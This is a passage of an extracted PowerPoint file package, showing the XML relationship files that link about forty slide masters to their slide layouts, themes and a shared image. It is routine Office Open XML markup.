Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout290.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout281.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout29.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout299.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout298.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout297.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout296.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout295.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout294.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout293.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout292.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout300.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout291.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout309.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout308.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout307.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout306.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout304.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout302.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout310.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout301.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout319.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout318.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout317.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout316.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout314.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout313.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout312.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout320.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout311.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout329.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout328.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout327.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout326.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout325.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout323.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout322.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout330.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout321.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout338.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout337.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout336.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout335.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout334.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout333.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout332.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout331.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout349.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout348.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout347.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout346.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout345.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout344.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout343.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout342.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout350.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout341.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout359.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout358.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout357.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout356.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout355.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout354.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout353.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout352.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout360.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout351.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout369.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout368.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout367.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout366.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout365.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout364.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout363.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout362.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout370.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout361.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout379.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout378.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout377.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout376.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout375.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout374.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout373.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout372.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout371.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout389.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout388.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout387.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout386.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout385.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout384.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout383.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout382.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout390.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout381.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout37.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout34.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout40.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout31.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster40.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout399.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout398.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout397.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout396.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout395.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout392.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout400.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout391.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout409.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout408.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout407.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout406.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout405.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout404.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout403.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout402.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout410.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout401.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout419.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout418.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout417.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout416.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout415.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout414.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout413.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout412.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout420.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout411.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout429.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout427.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout426.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout425.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout424.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout423.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout422.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId11" 